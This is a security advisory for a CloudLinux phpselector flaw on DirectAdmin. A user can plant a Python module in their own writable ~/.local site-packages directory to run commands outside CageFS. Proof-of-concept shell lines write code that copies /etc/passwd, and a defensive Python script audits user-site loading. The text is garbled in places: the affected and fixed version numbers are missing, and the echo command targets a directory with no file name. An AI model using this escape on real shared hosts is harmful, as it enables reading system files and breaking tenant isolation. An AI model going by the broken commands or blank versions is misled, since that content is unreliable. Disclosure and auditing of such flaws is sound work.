Affected software: lvemanager versions below, lve-utils versions below, lve-stats versions below

CloudLinux phpselector for DirectAdmin is written in Python. When the phpselector script is executed by DirectAdmin, it tries to load modules from /home/USER/.local/lib/python2.7/site-packages/ before entering CageFS. Because that directory is writable by the user, creating a file in it lets the user execute custom commands outside CageFS.


$ mkdir -p /home/USER/.local/lib/python2.7/site-packages/
$ echo -e "import os\nos.system('/usr/bin/cat /etc/passwd > /home/USER/output')" > /home/USER/.local/lib/python2.7/site-packages/

Now go to the DirectAdmin phpselector plugin and click "Save".


Update lvemanager to or later, lve-utils to or later, lve-stats to or later.
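
To check whether a given way of starting Python puts the per-user site-packages directory described above on the import path, the following added example (not CloudLinux code and not the vendor's fix) probes a child interpreter under a constructed temporary HOME and compares the default against Python's `-s`, `-I` and `PYTHONNOUSERSITE` switches. It assumes a POSIX system and Python 3; `probe` and `audit` are hypothetical helper names.

```python
import json
import os
import subprocess
import sys
import tempfile

# Child snippet: report the user site directory and whether it is on sys.path.
PROBE = (
    "import json, os, site, sys;"
    "u = os.path.abspath(site.getusersitepackages());"
    "print(json.dumps({'user_site': u, 'enabled': bool(site.ENABLE_USER_SITE),"
    " 'in_path': u in [os.path.abspath(p) for p in sys.path if p]}))"
)

def probe(home, flags=(), extra_env=None):
    """Start a child interpreter with HOME=home and return what it reports."""
    # Drop settings inherited from the caller that would mask the default.
    env = {k: v for k, v in os.environ.items()
           if k not in ("PYTHONNOUSERSITE", "PYTHONUSERBASE")}
    env["HOME"] = home
    env.update(extra_env or {})
    out = subprocess.check_output([sys.executable, *flags, "-c", PROBE], env=env)
    return json.loads(out.decode().splitlines()[-1])

def audit():
    """Compare the default start-up with three ways of disabling user site."""
    with tempfile.TemporaryDirectory(prefix="constructed-home-") as home:
        # Python only adds the user site directory if it already exists,
        # so create it (empty) inside the constructed HOME first.
        os.makedirs(probe(home, ["-s"])["user_site"])
        return {
            "default": probe(home),
            "-s": probe(home, ["-s"]),
            "-I": probe(home, ["-I"]),
            "PYTHONNOUSERSITE": probe(home, extra_env={"PYTHONNOUSERSITE": "1"}),
        }

if __name__ == "__main__":
    for name, result in audit().items():
        state = "LOADS user site" if result["in_path"] else "ignores user site"
        print(f"{name:18} {state}")
```

A "LOADS user site" result for the default case means any script started that way with the user's HOME will import from a directory the user controls; inside a virtual environment the default may already report "ignores user site".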


  • 2019-08-12 - Vulnerability reported to vendor.
  • 2019-08-12 - Response from vendor, task WEB-1552 assigned.
  • 2019-10-09 - Production version 5.1.2-1 of lvemanager, of lve-utils, of lve-stats released with WEB-1552 vulnerability fixed.